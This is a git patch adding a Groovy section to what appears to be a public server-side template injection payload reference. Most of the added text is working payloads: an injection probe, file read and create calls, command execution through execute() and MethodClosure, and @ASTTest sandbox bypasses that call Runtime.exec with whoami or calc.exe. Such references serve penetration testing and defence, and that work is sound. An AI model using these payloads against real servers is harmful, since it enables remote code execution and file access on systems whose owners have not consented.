From 3db4d04467507e8ab2bca719c5ca20bf6b6ca8e2 Mon Sep 17 00:00:00 2001
From: 0x-nope <gianbaldi@gmail.com>
Date: Fri, 4 Mar 2022 17:39:28 +0100
Subject: [PATCH] added Groovy EL section

---
 Server Side Template Injection/README.md | 56 ++++++++++++++++++++++++
 1 file changed, 56 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index b70b1e3..94f00d7 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -15,6 +15,12 @@
 * [Freemarker](#freemarker)
   * [Basic injection](#freemarker---basic-injection)
   * [Code execution](#freemarker---code-execution)
+* [Groovy](#groovy)
+  * [Basic injection](#groovy---basic-injection)
+  * [Read/Create file](#groovy---read-and-create-file)
+  * [HTTP Request](#groovy---http-request)
+  * [Command execution](#groovy---command-execution)
+  * [Sandbox bypass](#groovy---sandbox-bypass)
 * [Handlebars](#handlebars)
 * [Jade / Codepen](#jade--codepen)
 * [Java](#java)
@@ -184,6 +190,56 @@ ${dwf.newInstance(ec,null)("id")}
 
 ---
 
+## Groovy
+
+[Official website](https://groovy-lang.org/)
+
+
+### Groovy - Basic injection
+
+Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
+
+
+### Groovy - Read and create File
+
+```groovy
+String x = new File('c:/windows/notepad.exe').text
+String x = new File('/path/to/file').getText('UTF-8')
+new File("C:\Temp\FileName.txt").createNewFile();
+```
+
+### Groovy - HTTP request:
+
+
+```groovy
+"http://www.google.com".toURL().text
+new URL("http://www.google.com").getText()
+```
+
+### Groovy - Command Execution
+
+```groovy
+"calc.exe".exec()
+"calc.exe".execute()
+this.evaluate("9*9") //(this is a Script)
+new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
+```
+
+### Groovy - Sandbox Bypass
+
+```groovy
+@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
+def x
+```
+
+or
+
+```groovy
+new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
+```
+
+---
+
 ## Handlebars
 
 [Official website](https://handlebarsjs.com/)